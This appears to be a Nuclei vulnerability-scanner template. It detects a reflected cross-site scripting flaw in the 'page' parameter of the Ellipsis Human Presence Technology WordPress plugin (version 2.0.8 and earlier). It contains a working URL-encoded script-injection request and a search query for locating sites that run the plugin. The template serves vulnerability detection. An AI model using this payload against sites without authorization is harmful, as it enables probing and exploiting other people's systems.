nuclei-templates/http/vulnerabilities/wordpress/wp-ellipsis-xss.yaml

40 lines
1.4 KiB
YAML

id: wp-ellipsis-xss
info:
name: Ellipsis Human Presence Technology <= 2.0.8 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The 'page' GET parameter of the inc/protected-forms-table.php file was affected by a reflected XSS vulnerability.
reference:
- https://wpscan.com/vulnerability/c0a138d8-93ac-463c-b650-d849352c0b44
- https://packetstormsecurity.com/files/154393/
- https://wordpress.org/plugins/ellipsis-human-presence-technology/
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/ellipsis-human-presence-technology/"
tags: wpscan,packetstorm,wordpress,wp-plugin,ellipsis-human-presence-technology,xss
http:
- raw:
- |
GET /wp-content/plugins/ellipsis-human-presence-technology/inc/protected-forms-table.php?&page=%22%20%3E%3Cscript%3Ealert(document.location)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.location)</script>'
- '<form id="protected-forms-table"'
condition: and
- type: word
part: header
words:
- "text/html"
# digest: 4b0a00483046022100e680389ccf3f9d246c19f525d5385c3dea26ae8ae8844af53adcffa4972cadf4022100ba5cb93d68d92c9d508d7eab97820da9a3724d24a311addd11553a84e123a95d:922c64590222798bb761d5b6d8e72950